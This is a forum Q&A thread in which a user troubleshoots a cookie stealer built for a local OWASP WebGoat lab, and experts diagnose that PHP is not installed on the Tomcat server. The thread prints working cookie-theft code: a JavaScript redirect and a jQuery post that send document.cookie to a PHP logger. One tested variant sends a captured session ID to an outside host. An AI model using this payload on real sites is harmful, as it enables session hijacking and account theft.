Go Premium for a chance to win a PS4. Enter to Win

x
  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 128
  • Last Modified:

How to call a PHP script from Javascript in HTML

Hello experts,
 
  I'm trying to construct a basic cookie stealer.  I have Javascript in an HTML doc that calls a PHP file and passes it the value of the session cookie.  Now, I'm able to run the PHP file by itself and it creates the specified file, but when I open the basic HTML doc I only see the text of the PHP file in the browser window, and no text file is written in the PHP dir.  I've been scratching my head for a few hours this morning and am not sure what I'm doing wrong.  I've tried both var assignment and properties such as document.location in the HTML file:

HTML doc:
<script language="Javascript">
 document.location = "http://localhost:8080/WebGoat/cookiestealer.php?cookie=" + escape(document.cookie);
</script>

Open in new window


cookiestealer.php:
<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>

Open in new window


  This is probably something silly I'm overlooking.  Any ideas?
0
dilligent
Asked:
dilligent
  • 5
  • 4
  • 4
1 Solution
 
Ray PaseurCommented:
We can't really see the sequence of events here, but it may be possible that things are running in an out-of-order sequence.  The PHP scripts are run on the server and are complete before the HTML document is transmitted to the client and the JavaScript gets control.  And some cookies are settable in ways that hide them from JavaScript completely. One possibility might be to use AJAX to send the stolen cookies back to the server.  But whatever you do with something like this, beware that you will likely offend people if you try to gain access to their personally identifiable information without their permission.  In some places, this is a criminal activity with penalties that involve handcuffs and prison time, so tread lightly and do not do this to any client who has not given you explicit permission.  To protect yourself, you should probably insist on written permission!
0
 
dilligentAuthor Commented:
This is all in my OWASP WebGoat install on my local VM.  I understand that I can use AJAX, but it was my understanding that my setup should steal my session cookie and write it to a file on my VM.
0
 
Ray PaseurCommented:
For obvious reasons I am not going to leave these scripts on my server, but this tests out correctly.  Here is the server-side "Ajax" script:
<?php // demo/temp_dilligent_server.php
error_reporting(E_ALL);
date_default_timezone_set('America/Chicago');

// SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html

// START THE OUTPUT BUFFER TO CAPTURE THE var_dump() DISPLAY
ob_start();

// MAKE THE OUTPUT EASY TO READ
echo '<pre>';

// SEND BACK THE DATE...
echo date('r');
echo  PHP_EOL;

// ... AND THE GET-REQUEST VARIABLES
echo 'GET: ';
var_dump($_GET);

// ... AND THE POST-REQUEST VARIABLES
echo 'POST: ';
var_dump($_POST);

echo '</pre>';
echo  PHP_EOL;

Open in new window


And here is the client-side script that sends the data to the server.

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<!-- // SEE http://www.experts-exchange.com/Programming/Languages/Scripting/JavaScript/Q_28563154.html -->
<head>
<meta charset="utf-8" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.min.js"></script>
<script>
$(document).ready(function(){
    /* GRAB ANY COOKIES THAT JAVASCRIPT CAN SEE */
    var cookies = escape(document.cookie);
    /* SEND THE COOKIES TO THE SERVER */
    $.post("temp_dilligent_server.php", {myArg:cookies}, function(response){
        $("#output p#target").html(response);
    });
});
</script>

<title>E-E Q_28563154</title>
</head>
<body>

<noscript>Unable to steal cookies: JavaScript is not enabled!</noscript>

<div   id="output">
   <p  id="static">HERE ARE THE STOLEN COOKIES</p>
   <p  id="target">This element gets the AJAX response</p>
</div>

</body>
</html>

Open in new window

0
Technology Partners: We Want Your Opinion!

We value your feedback.

Take our survey and automatically be enter to win anyone of the following:
Yeti Cooler, Amazon eGift Card, and Movie eGift Card!

 
Ray PaseurCommented:
Let me see if I can get it to work with the document.location redirect.  If you haven't tried them, make a search for Google Dev Tools -- very helpful for things like this exercise.
0
 
Ray PaseurCommented:
This worked for the front-end script and it echoed the appropriate data:
<script language="Javascript">
document.location = "http://iconoun.com/demo/temp_dilligent_server.php?cookie=" + escape(document.cookie);
</script>

Open in new window

Output:
Sun, 16 Nov 2014 09:52:05 -0600
GET: array(1) {
  ["cookie"]=>
  string(51) "lang=de; PHPSESSID=d89beaeb16ef3d03a85d7ec1aa468133"
}
POST: array(0) {
}

Open in new window

I don't see any material difference between your scripts and mine, so you might want to step through the data visualization process using alert() and echo.
0
 
dilligentAuthor Commented:
I don't know what to say.  I see the entry in my access logs, and I see via Dev Tools and Fiddler that the cookie is indeed passed.  The problem is that the PHP doc is treated as text and is not executed.  No file is written, no statements are echoed if the .php file is changed.

Remote Address:127.0.0.1:8080
Request URL:http://localhost:8080/WebGoat/cookiestealer.php?cookie=
Request Method:GET
Status Code:200 OK
Request Headersview source
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-US,en;q=0.8
Connection:keep-alive
Cookie:JSESSIONID=FD2AF7912076525990DF420CF1E3D6D3
Host:localhost:8080
User-Agent:Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36
Query String Parametersview sourceview URL encoded
cookie:**********************
Response Headersview source
Accept-Ranges:bytes
Content-Length:174
Date:Sun, 16 Nov 2014 16:59:50 GMT
ETag:W/"174-1416157027159"
Last-Modified:Sun, 16 Nov 2014 16:57:07 GMT
Server:Apache-Coyote/1.1
0
 
Dave BaldwinFixer of ProblemsCommented:
You can start with the fact that Chrome will not allow a cookie to be set on 'localhost'.  The reason is that 'localhost' is not a unique domain.  The same is true with any page loaded with 'file://'.

My cookie test pages seem to work in Chrome with an IP address thru my web server on this machine.
0
 
dilligentAuthor Commented:
Regardless of whether or not I execute from localhost or change the URL and execute from my host machine while pointing to the VM, I still get no PHP file execution, and instead just get a 200 (or 304 if I repeat without clearing cookies) with the literal reponse back:

<?php
$file = fopen("cookie.txt","a");
fwrite($file, $_GET['cookie']);
fclose($file);
?>
0
 
Dave BaldwinFixer of ProblemsCommented:
I copied your code and made adjustments for my web server and it works ok.  I think that you do not have PHP installed on your web server or at least not on the Apache-Coyote/1.1 part of it.
0
 
dilligentAuthor Commented:
Hmmm, so I need it installed on the app server itself, in addition to the app server box?  That is new to me, if so.  I'll look into this and get back to this question.
0
 
Dave BaldwinFixer of ProblemsCommented:
Standard Apache installs have some extra code that tells them when to run PHP code thru the PHP interpreter, it is not automatic.  If PHP is already installed on the server, it's the part that tells the web server to use the PHP interpreter to run the PHP code that you need.
0
 
dilligentAuthor Commented:
Thank you.  I'll install PHP on my Tomcat instance, as I'm fairly certain that this is the problem.
0
 
Dave BaldwinFixer of ProblemsCommented:
You're welcome.
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

  • 5
  • 4
  • 4
Tackle projects and never again get stuck behind a technical roadblock.
Join Now